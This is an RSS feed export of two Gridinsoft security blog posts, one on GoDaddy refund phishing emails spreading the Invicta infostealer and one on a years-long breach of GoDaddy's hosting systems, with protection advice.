GoDaddy Archives – Gridinsoft Blog Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 30 May 2024 16:53:27 +0000 en-US hourly 1 https://wordpress.org/?v=90674 200474804 GoDaddy Refund Phishing Emails Spread Infostealer https://gridinsoft.com/blogs/godaddy-refund-phishing-infostealer/ https://gridinsoft.com/blogs/godaddy-refund-phishing-infostealer/#respond Fri, 26 May 2023 15:32:08 +0000 https://gridinsoft.com/blogs/?p=14704 Hackers started using GoDaddy Refund Emails as a disguise to trick the users into installing malware. In order to deploy the payload, they opted for a particularly new tactic or, well, combination of ones. As a payload, a unique free open-source Invicta Stealer is used. GoDaddy Refund Email Phishing Being a widely popular web hosting… Continue reading GoDaddy Refund Phishing Emails Spread Infostealer

The post GoDaddy Refund Phishing Emails Spread Infostealer appeared first on Gridinsoft Blog.

]]>
Hackers started using GoDaddy Refund Emails as a disguise to trick the users into installing malware. In order to deploy the payload, they opted for a particularly new tactic or, well, combination of ones. As a payload, a unique free open-source Invicta Stealer is used.

GoDaddy Refund Email Phishing

Being a widely popular web hosting provider, GoDaddy obviously has a line of different options for money chargebacks. Some people are not happy with how the service works, some people want to cancel the domain parking or hosting due to personal reasons – refund emails are typical for such requests. This is where hackers decided to take inspiration from.

Random users started receiving emails with the topic set as “GoDaddy Refund”. It touched even ones who have never ever interacted with the company and its services. There were no reported cases of using compromised emails that belong to GoDaddy. These emails contain a pretty standard notification about the incoming refund and the link to a page “where you can get the refund details”. Obviously, even when a person is new to GoDaddy, they will most likely be eager to check it up. This link leads to a page that, once again, repeats a genuine one used by the company to share documents.

GoDaddy Refund Email Phishing page
Phishing page that redirects to a malware downloading

The page, however, does not start a direct download, and instead redirects the victim to a Discord URL, where the .zip archive is downloaded. This archive contains an .lnk file, disguised as a PDF document, which launches the PowerShell script. The latter initiates downloading and running the Invicta stealer.

.lnk file Invicta stealer
Properties of the .lnk file that downloads Invicta stealer

Invicta Stealer Description

Invicta is a pretty unique example of an infostealer. By default, it is free and open-source, meaning that its source code is available to the public on GitHub. Another malware with similar philosophy is HiddenTear ransomware – one in its kind as well. Though in the Telegram group where the stealer developers are promoting their stealer, there are the offers to purchase the web panel access for $50.

Invicta stealer telegram
Telegram community that promotes Invicta Stealer

However, other details of Invicta are way less unusual. Same as other modern-time stealers, it applies several anti-analysis and anti-detection tricks upon execution. Then, it routinely starts with grabbing Discord and Steam session tokens and crypto wallets information. The latter is collected only from desktop apps, while most of other stealers will also aim at browser extensions as well. Browsers are treated separately: malware takes every piece of a file that can contain valuable information. It also can target the KeyPass password manager app – less common, but still expected capability.

Targeted browsers and cryptowallets

Click to expand

List of targeted web browsers

BraveSoftware Amigo Chedot
Citrio Sputnik ChromePlus
Uran Epic Privacy Browser Blisk
Opera Stable Google Chrome Coowon
Orbitum Elements Browser 360Browser
Microsoft Edge Torch Yandex
CocCoc Browser liebao Vivaldi
Sleipnir Opera Neon QIP Surf
7Star Comodo Dragon Kometa
Chromium CentBrowser Iridium

List of targeted cryptocurrency wallets

Neon neblio Guarda
Coinomi CloakCoin Electrum-LTC
ark-desktop-wallet WalletWasabi Litecoin
Zcash Exodus Bitcoin
Dogecoin ElectrumG Electrum-Smart
Nano Wallet Desktop Armory Exodus Eden
VERGE atomic scatter
Electrum MultiBitHD com.liberty.jaxx
Binance Daedalus Mainnet

Aside from passwords and session tokens, Invicta stealer gathers some trivial information regarding the system. It is a system screen size, CPU count, OS version and build, HWID, time zone and username. Malware can also gather other data when receiving a corresponding command – for example, enumerate users and installed programs. That data is commonly used to fingerprint the system, but can also be useful to emulate the victim’s system for more precise session hijacks.

How to protect yourself?

Here, two vectors of protection may be applied. First is proactive – the counteraction to email spam and phishing pages on the Web. Another one is rather a second line of defence – the one which protects against the spyware/stealer payload.

Pay attention to emails you’re opening. Most of the time, they are harmless – but that is what hackers want you to think. If you’ve received an email which you do not expect to receive, or its contents are not typical to what the sender typically sends, it is better to perform a diligent checkup. Most of the time, you will find differences in the sender’s email address, and, in some cases, typos or mistakes in the message body. Though, in rare cases of business email compromise, it may be hard to say whether the sender is legit or not. For that reason, relying entirely on your attention is not a guarantee.

Use anti-malware software with network monitoring. Here, anti-malware programs will act as both reactive and proactive solutions. Having a netmonitor makes it useful for preventing you from accessing phishing pages. Meanwhile, when malware manages to arrive at your device, it will still be blocked, especially when the program has a well-designed proactive protection system. GridinSoft Anti-Malware is the one you may rely on – consider giving it a try.

GoDaddy Refund Phishing Emails Spread Infostealer

The post GoDaddy Refund Phishing Emails Spread Infostealer appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/godaddy-refund-phishing-infostealer/feed/ 0 14704
Hackers Attacked GoDaddy and Stayed on the Company’s Systems for Several Years https://gridinsoft.com/blogs/attackers-hacked-godaddy/ https://gridinsoft.com/blogs/attackers-hacked-godaddy/#respond Tue, 21 Feb 2023 09:06:58 +0000 https://gridinsoft.com/blogs/?p=13414 One of the world’s largest hosters and domain name registrars, GoDaddy, reports that hackers have compromised the company’s infrastructure. Worse, the company concluded that this was just one in a series of related incidents. It turns out that unknown attackers had access to the company’s systems for several years, were able to install malware on… Continue reading Hackers Attacked GoDaddy and Stayed on the Company’s Systems for Several Years

The post Hackers Attacked GoDaddy and Stayed on the Company’s Systems for Several Years appeared first on Gridinsoft Blog.

]]>

One of the world’s largest hosters and domain name registrars, GoDaddy, reports that hackers have compromised the company’s infrastructure. Worse, the company concluded that this was just one in a series of related incidents. It turns out that unknown attackers had access to the company’s systems for several years, were able to install malware on its servers, and stole the source code.

Let me remind you that we also reported that the Epik hoster hack affected 15 million users, not just the company’s clients, and also that Fosshost, an Open-Source Project Hosting, Is Closing Down as Its Leader Disappeared.

According to a report filed by the company with the U.S. Securities and Exchange Commission, the security breach was discovered in December 2022, when customers began reporting that their sites were being used to redirect visitors to random domains. After conducting an investigation, GoDaddy experts came to disappointing conclusions:

Based on our investigation, we believe these incidents are part of a years-long campaign by an experienced group of attackers who, among other things, installed malware on our systems and obtained source code snippets related to certain services on GoDaddy.the company wrote.

It turned out that in December 2022, an attacker gained access to cPanel hosting servers, which customers use to manage sites hosted by GoDaddy. Then the hackers installed some kind of malware on the servers, and the malware “periodically redirected random client sites to malicious ones.”

In addition, incidents dated November 2021 and March 2020 are also reported to have been linked to these attackers.

Let me remind you that in 2021 it became known about the strange compromise of 1.2 million sites running on WordPress. All affected resources were hosted by GoDaddy, and then the company claimed that there was a hack and data leakage: the attackers gained access to the email addresses of all affected clients, their WordPress administrator passwords, sFTP and database credentials, and private SSL keys.

In 2020, GoDaddy notified 28,000 customers that in October 2019, attackers used their credentials to log into a hosting account and connect to their account via SSH.

Now, GoDaddy says it has found additional evidence linking these attackers to a larger malware campaign that has been going on for years against other hosting companies around the world.

We have evidence, and law enforcement confirms, that this incident is connected to an experienced and organized group targeting hosting companies such as GoDaddy. According to the information we have received, their most likely purpose is to infect websites and servers with malware to carry out phishing campaigns, spread malware and perform other malicious activities.the company said in a statement.

GoDaddy is known to have engaged third-party security experts in the ongoing investigation and is also working with law enforcement around the world to uncover the source of these years-long attacks.

The post Hackers Attacked GoDaddy and Stayed on the Company’s Systems for Several Years appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/attackers-hacked-godaddy/feed/ 0 13414